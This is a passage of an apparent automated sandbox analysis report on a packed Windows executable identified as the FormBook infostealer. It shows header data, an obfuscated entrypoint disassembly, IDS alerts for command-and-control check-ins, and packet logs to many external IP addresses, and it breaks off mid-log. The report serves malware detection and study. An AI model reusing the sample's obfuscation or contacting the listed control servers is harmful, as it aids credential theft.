                                                                    Time Stamp:0x60E3E289 [Tue Jul 6 04:56:41 2021 UTC]
                                                                    TLS Callbacks:
                                                                    CLR (.Net) Version:
                                                                    OS Version Major:6
                                                                    OS Version Minor:0
                                                                    File Version Major:6
                                                                    File Version Minor:0
                                                                    Subsystem Version Major:6
                                                                    Subsystem Version Minor:0
                                                                    Import Hash:

                                                                    Entrypoint Preview

                                                                    Instruction
                                                                    push ebp
                                                                    mov ebp, esp
                                                                    sub esp, 00000424h
                                                                    push ebx
                                                                    push esi
                                                                    push edi
                                                                    push 0000040Ch
                                                                    lea eax, dword ptr [ebp-00000420h]
                                                                    push 00000000h
                                                                    push eax
                                                                    mov dword ptr [ebp-00000424h], 00000000h
                                                                    call 00007F51E8BB51ACh
                                                                    add esp, 0Ch
                                                                    sub ecx, ecx
                                                                    xor edi, edi
                                                                    sub esi, esi
                                                                    mov dword ptr [ebp-14h], 00000054h
                                                                    mov dword ptr [ebp-10h], 00003B15h
                                                                    mov dword ptr [ebp-0Ch], 00001B0Dh
                                                                    mov dword ptr [ebp-08h], 00004BD2h
                                                                    push eax
                                                                    pop eax
                                                                    inc ecx
                                                                    push ecx
                                                                    pop eax
                                                                    and eax, 80000007h
                                                                    jns 00007F51E8BB35B7h
                                                                    dec eax
                                                                    or eax, FFFFFFF8h
                                                                    inc eax
                                                                    jne 00007F51E8BB35B4h
                                                                    add ecx, ecx
                                                                    cmp ecx, 00000CB4h
                                                                    jl 00007F51E8BB3597h
                                                                    mov ecx, 00006ACDh
                                                                    mov eax, 92492493h
                                                                    imul ecx
                                                                    add edx, ecx
                                                                    sar edx, 05h
                                                                    push edx
                                                                    pop ecx
                                                                    shr ecx, 1Fh
                                                                    add ecx, edx
                                                                    jne 00007F51E8BB359Dh
                                                                    mov eax, 00001819h
                                                                    push ebx
                                                                    pop ebx
                                                                    push 0000001Bh
                                                                    pop edx
                                                                    mov ecx, 000000C2h
                                                                    cmp ecx, edx
                                                                    cmovl ecx, edx
                                                                    dec eax
                                                                    jne 00007F51E8BB35AAh
                                                                    mov ecx, 00001F5Ah
                                                                    mov eax, 82082083h
                                                                    imul ecx
                                                                    add edx, ecx
                                                                    sar edx, 06h
                                                                    mov ecx, edx
                                                                    shr ecx, 1Fh
                                                                    add ecx, edx
                                                                    jne 00007F51E8BB359Dh
                                                                    call 00007F51E8BB540Ah
                                                                    mov dword ptr [ebp-5Ch], eax
                                                                    mov edi, edi
                                                                    inc edi
                                                                    mov eax, 55555556h
                                                                    imul edi

                                                                    Rich Headers

                                                                    Programming Language:
                                                                    • [C++] VS2012 build 50727
                                                                    • [ASM] VS2012 build 50727
                                                                    • [LNK] VS2012 build 50727

                                                                    Data Directories

                                                                    NameVirtual AddressVirtual Size Is in Section
                                                                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                    IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                                                    Sections

                                                                    NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                    .text0x10000x456940x45800790a1dc9453c606dcef2ea8be0aee67eFalse0.9886149674010791data7.995279909719649IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

                                                                    Network Behavior

                                                                    Suricata IDS Alerts

                                                                    TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                    2025-01-03T11:39:10.541104+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450050154.39.239.23780TCP
                                                                    2025-01-03T11:39:10.541104+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450050154.39.239.23780TCP
                                                                    2025-01-03T11:39:44.159101+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44973647.83.1.9080TCP
                                                                    2025-01-03T11:39:44.159101+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44973647.83.1.9080TCP
                                                                    2025-01-03T11:39:59.788721+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44977384.32.84.3280TCP
                                                                    2025-01-03T11:40:02.382659+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44978884.32.84.3280TCP
                                                                    2025-01-03T11:40:05.143650+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.44980584.32.84.3280TCP
                                                                    2025-01-03T11:40:07.550751+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.44982484.32.84.3280TCP
                                                                    2025-01-03T11:40:07.550751+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.44982484.32.84.3280TCP
                                                                    2025-01-03T11:40:13.231825+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449859104.21.18.17180TCP
                                                                    2025-01-03T11:40:15.808369+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449875104.21.18.17180TCP
                                                                    2025-01-03T11:40:18.425050+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449891104.21.18.17180TCP
                                                                    2025-01-03T11:40:21.031425+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.449912104.21.18.17180TCP
                                                                    2025-01-03T11:40:21.031425+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.449912104.21.18.17180TCP
                                                                    2025-01-03T11:40:27.236732+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449953134.122.133.8080TCP
                                                                    2025-01-03T11:40:29.786086+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449969134.122.133.8080TCP
                                                                    2025-01-03T11:40:32.362799+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.449988134.122.133.8080TCP
                                                                    2025-01-03T11:40:34.899049+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450004134.122.133.8080TCP
                                                                    2025-01-03T11:40:34.899049+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450004134.122.133.8080TCP
                                                                    2025-01-03T11:40:40.573071+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450015199.192.21.16980TCP
                                                                    2025-01-03T11:40:43.116447+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450016199.192.21.16980TCP
                                                                    2025-01-03T11:40:45.762531+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450017199.192.21.16980TCP
                                                                    2025-01-03T11:40:48.229476+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450018199.192.21.16980TCP
                                                                    2025-01-03T11:40:48.229476+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450018199.192.21.16980TCP
                                                                    2025-01-03T11:40:54.204900+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450019154.197.162.23980TCP
                                                                    2025-01-03T11:40:56.792856+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450020154.197.162.23980TCP
                                                                    2025-01-03T11:40:59.463232+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450021154.197.162.23980TCP
                                                                    2025-01-03T11:41:01.916844+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450022154.197.162.23980TCP
                                                                    2025-01-03T11:41:01.916844+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450022154.197.162.23980TCP
                                                                    2025-01-03T11:41:07.454582+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002384.32.84.3280TCP
                                                                    2025-01-03T11:41:10.011574+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002484.32.84.3280TCP
                                                                    2025-01-03T11:41:12.555308+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45002584.32.84.3280TCP
                                                                    2025-01-03T11:41:15.122175+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45002684.32.84.3280TCP
                                                                    2025-01-03T11:41:15.122175+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45002684.32.84.3280TCP
                                                                    2025-01-03T11:41:21.487271+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450027134.122.133.8080TCP
                                                                    2025-01-03T11:41:24.041121+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450028134.122.133.8080TCP
                                                                    2025-01-03T11:41:26.596097+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450029134.122.133.8080TCP
                                                                    2025-01-03T11:41:29.157934+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450030134.122.133.8080TCP
                                                                    2025-01-03T11:41:29.157934+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450030134.122.133.8080TCP
                                                                    2025-01-03T11:41:35.730610+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003147.83.1.9080TCP
                                                                    2025-01-03T11:41:38.276125+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003247.83.1.9080TCP
                                                                    2025-01-03T11:41:40.822991+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45003347.83.1.9080TCP
                                                                    2025-01-03T11:41:43.461990+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45003447.83.1.9080TCP
                                                                    2025-01-03T11:41:43.461990+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45003447.83.1.9080TCP
                                                                    2025-01-03T11:41:49.027167+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450035188.114.97.380TCP
                                                                    2025-01-03T11:41:51.582140+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450036188.114.97.380TCP
                                                                    2025-01-03T11:41:54.160245+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450037188.114.97.380TCP
                                                                    2025-01-03T11:41:56.688749+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450038188.114.97.380TCP
                                                                    2025-01-03T11:41:56.688749+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450038188.114.97.380TCP
                                                                    2025-01-03T11:42:10.330134+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450039199.59.243.22880TCP
                                                                    2025-01-03T11:42:12.888933+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450040199.59.243.22880TCP
                                                                    2025-01-03T11:42:15.456146+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450041199.59.243.22880TCP
                                                                    2025-01-03T11:42:18.010612+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.450042199.59.243.22880TCP
                                                                    2025-01-03T11:42:18.010612+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.450042199.59.243.22880TCP
                                                                    2025-01-03T11:42:24.032658+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004313.228.81.3980TCP
                                                                    2025-01-03T11:42:26.620947+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004413.228.81.3980TCP
                                                                    2025-01-03T11:42:29.200835+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.45004513.228.81.3980TCP
                                                                    2025-01-03T11:42:31.693060+01002050745ET MALWARE FormBook CnC Checkin (GET) M51192.168.2.45004613.228.81.3980TCP
                                                                    2025-01-03T11:42:31.693060+01002855465ETPRO MALWARE FormBook CnC Checkin (GET) M21192.168.2.45004613.228.81.3980TCP
                                                                    2025-01-03T11:42:38.776296+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450047154.39.239.23780TCP
                                                                    2025-01-03T11:42:41.370252+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450048154.39.239.23780TCP
                                                                    2025-01-03T11:42:43.950799+01002855464ETPRO MALWARE FormBook CnC Checkin (POST) M31192.168.2.450049154.39.239.23780TCP

                                                                    Network Port Distribution

                                                                    TCP Packets

                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                    Jan 3, 2025 11:39:42.565233946 CET4973680192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:39:42.570060015 CET804973647.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:39:42.570254087 CET4973680192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:39:42.580204010 CET4973680192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:39:42.585025072 CET804973647.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:39:44.158767939 CET804973647.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:39:44.159055948 CET804973647.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:39:44.159101009 CET4973680192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:39:44.161750078 CET4973680192.168.2.447.83.1.90
                                                                    Jan 3, 2025 11:39:44.166512966 CET804973647.83.1.90192.168.2.4
                                                                    Jan 3, 2025 11:39:59.316493988 CET4977380192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:39:59.321276903 CET804977384.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:39:59.321342945 CET4977380192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:39:59.349128008 CET4977380192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:39:59.353899002 CET804977384.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:39:59.788635969 CET804977384.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:39:59.788721085 CET4977380192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:00.853916883 CET4977380192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:00.858678102 CET804977384.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:01.901679993 CET4978880192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:01.906460047 CET804978884.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:01.906548977 CET4978880192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:02.007220030 CET4978880192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:02.012089014 CET804978884.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:02.382580042 CET804978884.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:02.382658958 CET4978880192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:03.525746107 CET4978880192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:03.530528069 CET804978884.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:04.544014931 CET4980580192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:04.548815012 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:04.548886061 CET4980580192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:04.561172962 CET4980580192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:04.566046000 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:04.566066027 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:04.566087008 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:04.566095114 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:04.566143036 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:04.566154003 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:04.566162109 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:04.566278934 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:04.566292048 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:05.143548012 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:05.143650055 CET4980580192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:06.072712898 CET4980580192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:06.077486992 CET804980584.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.090854883 CET4982480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:07.095678091 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.095741987 CET4982480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:07.103847027 CET4982480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:07.108628035 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.550666094 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.550678968 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.550690889 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.550700903 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.550712109 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.550729036 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.550740957 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.550750971 CET4982480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:07.550755024 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.550766945 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.550776958 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:07.550827980 CET4982480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:07.550852060 CET4982480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:07.555296898 CET4982480192.168.2.484.32.84.32
                                                                    Jan 3, 2025 11:40:07.560102940 CET804982484.32.84.32192.168.2.4
                                                                    Jan 3, 2025 11:40:12.575786114 CET4985980192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:12.580655098 CET8049859104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:12.580720901 CET4985980192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:12.594893932 CET4985980192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:12.599740982 CET8049859104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:13.230781078 CET8049859104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:13.231775999 CET8049859104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:13.231825113 CET4985980192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:14.103902102 CET4985980192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:15.141732931 CET4987580192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:15.146646023 CET8049875104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:15.146728039 CET4987580192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:15.206708908 CET4987580192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:15.211502075 CET8049875104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:15.806989908 CET8049875104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:15.808026075 CET8049875104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:15.808368921 CET4987580192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:16.713315010 CET4987580192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:17.775010109 CET4989180192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:17.779794931 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:17.779879093 CET4989180192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:17.848890066 CET4989180192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:17.853852987 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:17.853863955 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:17.853919983 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:17.853974104 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:17.854022026 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:17.854082108 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:17.854090929 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:17.854145050 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:17.854161024 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:18.424420118 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:18.425002098 CET8049891104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:18.425050020 CET4989180192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:19.353965044 CET4989180192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:20.372555017 CET4991280192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:20.377577066 CET8049912104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:20.377676010 CET4991280192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:20.387032986 CET4991280192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:20.391899109 CET8049912104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:21.031281948 CET8049912104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:21.031373024 CET8049912104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:21.031424999 CET4991280192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:21.033901930 CET4991280192.168.2.4104.21.18.171
                                                                    Jan 3, 2025 11:40:21.038696051 CET8049912104.21.18.171192.168.2.4
                                                                    Jan 3, 2025 11:40:26.362147093 CET4995380192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:26.367094040 CET8049953134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:26.367301941 CET4995380192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:26.381134987 CET4995380192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:26.386020899 CET8049953134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:27.236280918 CET8049953134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:27.236649990 CET8049953134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:27.236732006 CET4995380192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:27.885206938 CET4995380192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:28.903947115 CET4996980192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:28.908751965 CET8049969134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:28.908854008 CET4996980192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:28.922775984 CET4996980192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:28.927701950 CET8049969134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:29.785847902 CET8049969134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:29.786027908 CET8049969134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:29.786086082 CET4996980192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:30.432107925 CET4996980192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:31.450877905 CET4998880192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:31.455650091 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:31.455733061 CET4998880192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:31.470673084 CET4998880192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:31.475574017 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:31.475595951 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:31.475619078 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:31.475636005 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:31.475645065 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:31.475652933 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:31.475661993 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:31.475802898 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:31.475811958 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:32.361994982 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:32.362750053 CET8049988134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:32.362798929 CET4998880192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:32.978971958 CET4998880192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:33.997631073 CET5000480192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:34.002691984 CET8050004134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:34.002829075 CET5000480192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:34.012120962 CET5000480192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:34.016958952 CET8050004134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:34.898797035 CET8050004134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:34.898890972 CET8050004134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:34.899049044 CET5000480192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:34.918138027 CET5000480192.168.2.4134.122.133.80
                                                                    Jan 3, 2025 11:40:34.922907114 CET8050004134.122.133.80192.168.2.4
                                                                    Jan 3, 2025 11:40:39.951579094 CET5001580192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:39.956429958 CET8050015199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:39.956501007 CET5001580192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:39.979723930 CET5001580192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:39.984632969 CET8050015199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:40.572974920 CET8050015199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:40.572994947 CET8050015199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:40.573071003 CET5001580192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:41.496480942 CET5001580192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:42.513225079 CET5001680192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:42.518059015 CET8050016199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:42.518152952 CET5001680192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:42.533444881 CET5001680192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:42.538244963 CET8050016199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:43.112173080 CET8050016199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:43.112360954 CET8050016199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:43.116446972 CET5001680192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:44.041587114 CET5001680192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:45.061449051 CET5001780192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:45.066355944 CET8050017199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:45.072729111 CET5001780192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:45.086481094 CET5001780192.168.2.4199.192.21.169
                                                                    Jan 3, 2025 11:40:45.091372967 CET8050017199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:45.091384888 CET8050017199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:45.091398954 CET8050017199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:45.091407061 CET8050017199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:45.091415882 CET8050017199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:45.091552973 CET8050017199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:45.091562033 CET8050017199.192.21.169192.168.2.4
                                                                    Jan 3, 2025 11:40:45.091569901 CET8050017199.192.21.169192.168.2.4
